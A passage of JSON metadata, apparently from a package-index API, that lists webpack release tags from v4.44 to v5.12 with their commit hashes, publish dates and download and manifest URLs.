.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag"